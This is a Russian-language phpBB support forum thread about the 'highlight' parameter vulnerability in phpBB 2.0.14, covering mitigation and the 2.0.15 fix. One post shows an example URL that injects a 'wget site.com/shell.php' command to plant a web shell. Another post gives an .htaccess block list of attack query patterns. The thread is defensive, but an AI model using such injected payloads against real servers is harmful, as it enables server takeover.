Уязвимость phpbb 2.0.14

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
sigal
phpBB Plus
Сообщения: 442
Стаж: 20 лет 11 месяцев
Откуда: КПРФ ;)

Сообщение sigal »

так блин в чем тогда баг????????
как его сделать.??? мне протестировать надо!!!!! :?
Аватара пользователя
alexenin
phpBB 1.2.1
Сообщения: 27
Стаж: 20 лет 10 месяцев

Сообщение alexenin »

На чужом сайте могут достать куку для вашего форума через браузер "не подозревающего пользователя", ну и хай с ним.

Этот баг касается пользователей закрытых форумом. Ну и админов. :shock:
Очень не удобный стал стиль форума...
И в профиле, как всегда, без выбора.
quazi
phpBB 2.0.2
Сообщения: 306
Стаж: 20 лет 2 месяца

Сообщение quazi »

вообще-то эта уязвимость не версии 2.0.14
скорее всего, она существовала и раньше
Аватара пользователя
Егор Наклоняев
phpBB 2.0.4
Сообщения: 404
Стаж: 20 лет 6 месяцев
Откуда: оттуда

Сообщение Егор Наклоняев »

quazi
Естественно, существовало. Там же написано.

Знаете, мне пофигу что делает этот баг, и что можно вредного туда запихнуть, я не кулхацкер - я пожилой мужчина обремененный семьёй, детьми и домашними животными. Я заметил, что он даёт искажения внешнего вида страницы, ergo при определенных условиях он может дать какую-либо бяку. Посему не мудрствуя лукаво зарезал на будущее все запросы такого вида и настучал в phpBB.com.

Dixi.
quazi
phpBB 2.0.2
Сообщения: 306
Стаж: 20 лет 2 месяца

Сообщение quazi »

зарезал на будущее все запросы такого вида и настучал в phpBB.com
Егор Наклоняев, ай малатцца!!
Аватара пользователя
Slimmy
phpBB 1.4.0
Сообщения: 34
Стаж: 20 лет 5 месяцев
Откуда: Солнечный Баку

Сообщение Slimmy »

sigal, опять-таки, этот баг (если можно Это назвать так) может быть полезен взломщику только если у хостера руки кривые.
Например, если хостер чмо, то поправив запрос можно изменить запрос

Код: Выделить всё

http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=\[]\
на

Код: Выделить всё

http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=wget%20site.com/shell.php
и кранты серверу))

А если у тебя не появилось ничего подозрительного при попытке ПЕРВОГО запроса, то беспокоится не о чем.
Подпись ушла...
Netman
phpBB 1.2.0
Сообщения: 19
Стаж: 20 лет 5 месяцев
Откуда: Minsk

Сообщение Netman »

Простите, но я так и не понял.
Что делать? Или ничего пока не делать.
Аватара пользователя
apaxuc
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет

Сообщение apaxuc »

Ошибка имела место быть в 13 версии.
После форматирования .httaccess все стало хорошо,
за что и благодарим очень и очень нашего доктора
Егора Наклоняева!

Спасибо!!
:P
boom
phpBB 1.2.0
Сообщения: 14
Стаж: 20 лет 4 месяца

Сообщение boom »

Отцы! Покажите, пожалуйста, актуальное содержание .htaccess для форума. У меня там пару строк есть, но чую не доброе... Грустно и как то жалко...
Аватара пользователя
apaxuc
phpBB 1.2.0
Сообщения: 15
Стаж: 20 лет

Сообщение apaxuc »

boom писал(а):Отцы! Покажите, пожалуйста, актуальное содержание .htaccess для форума. У меня там пару строк есть, но чую не доброе... Грустно и как то жалко...
<IfModule mod_charset.c>
CharsetRecodeMultipartForms off
</IfModule>

RewriteEngine on
RewriteBase /
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\\\[ [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^(.*)$ http://127.0.0.1/ [L,R=permanent]

Кладеца в корень форума.
Аватара пользователя
Rick
phpBB 1.4.2
Сообщения: 63
Стаж: 20 лет 5 месяцев

Сообщение Rick »

Вышла версия 2.0.15, в которой этот баг фиксится (Fixed bug in highlight code to escape characters correctly)
http://www.phpbbguru.net/community/viewtopic.php?t=2888

Вернуться в «Поддержка phpBB 2.0.x»